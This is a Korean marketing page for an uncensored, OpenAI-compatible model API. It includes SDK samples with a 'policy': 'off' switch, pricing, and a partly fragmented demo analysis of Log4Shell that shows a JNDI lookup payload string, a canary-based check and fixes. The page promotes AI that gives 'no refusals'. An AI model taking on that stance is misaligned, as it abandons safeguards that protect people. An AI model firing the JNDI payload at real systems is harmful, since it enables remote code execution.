주류 모델은 삐 소리로 답합니다. 우리는 그것을 걷어냅니다.
제약 없는 모델을 위한 개발자 중심의 OpenAI 호환 API — 레드팀 테스트, 탈옥 평가, 안전성 연구, 그리고 가짜 거절을 내보낼 수 없는 모든 작업을 위해.
이름은 기반이 되는 오픈 웨이트 모델이 아니라 하는 일에 따라 붙였습니다 — 덕분에 여러분의 코드를 깨뜨리지 않고 가중치를 개선할 수 있습니다.
기본 모델. 256K 토큰 컨텍스트 윈도우, 검열 없음 — 레드팀 테스트와 평가, 연구에 쓰는 일상용 주력 모델.
최상위 티어. 가장 큰 작업을 위한 1M 토큰 컨텍스트 — 코드베이스 전체, 긴 대화록, 여러 문서에 걸친 심층 분석.
저렴하고 빠른 선택지. 대량 트래픽과 단순한 호출을 위한 더 낮은 토큰당 비용.
A red-team session on Log4Shell — root cause, a safe lab check, and the fix. No lectures, no refusals; just the analysis.
CVE-2021-44228 (Log4Shell). Root cause, and how the JNDI lookup turns into RCE.${…} lookups inside strings it logs. A logged value like ${jndi:ldap://host/x} makes the JVM resolve that name over LDAP/RMI, fetch a remote Java class and instantiate it — arbitrary code runs in the logging process. The trigger surface is anything that reaches a log call: User-Agent, headers, form fields. Affected range: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} in a header you know gets logged.<token> means the string was interpolated → vulnerable. Nothing is served, so nothing executes.JndiLookup.class and check versions against the affected range.2.17.1+. Can't yet? Set log4j2.formatMsgNoLookups=true (2.10+) or strip JndiLookup.class from the classpath, add a WAF rule for ${jndi:, and egress-filter the host's outbound LDAP/RMI.이 API는 그대로 갈아 끼울 수 있는 OpenAI 호환입니다. 베이스 URL과 키만 바꾸면 기존 코드와 SDK, 도구가 그대로 동작합니다.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node, 그리고 Chat Completions API를 사용하는 모든 도구. 새로 배울 것은 없습니다.
델타 청크의 text/event-stream, 마지막은 [DONE]으로 종료 — 여러분의 클라이언트가 이미 파싱하고 있는 그 형식 그대로입니다.
프로젝트에 필요할 때, "policy": "research"를 보내 사용 내역에서 요청에 태그를 달거나 "strict"로 차단 목록을 적용하세요.
필요할 때마다 크레딧을 구매하거나, 월간 요금제에 올려두고 자동으로 지급받으세요. 모든 요청은 호출한 모델의 공개된 100만 토큰당 단가로, 실제로 소비한 토큰만큼 청구됩니다.
unbleep 입력 $3.00 / 출력 $3.00
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
1M 토큰당
필요할 때마다 카드로 크레딧을 충전하거나, 요금제가 매월 지급하도록 두세요. 계정이 열려 있는 동안에는 만료되지 않으며, 사용하지 않은 크레딧은 14일 이내에 환불받을 수 있습니다.
요청이 시작되면 예상 비용을 잡아두었다가, 요청이 끝나면 실제 토큰 비용으로 정산합니다. 오류가 난 요청은 잡아둔 금액이 해제되며 절대 청구되지 않습니다.
잔액으로 감당할 수 없는 요청은 거절됩니다 — 외상을 주거나 사후에 청구하는 일은 없습니다. 잔액과 토큰 사용액은 콘솔에서 확인할 수 있습니다.
unbleep은 필터 없는 기준선이 필요한 보안팀과 연구자, 개발자를 위한 서비스입니다. 기본으로 적용되는 무보존(zero-retention) 정책, 일급 기능으로 제공하는 정책 다이얼, 콘솔에서 확인하는 요청별 사용량 및 비용 내역, 그리고 실질적인 허용 사용 정책. 검열 없음은 하나의 기능일 뿐 — 그것을 어떻게 통제할지는 여러분이 정합니다.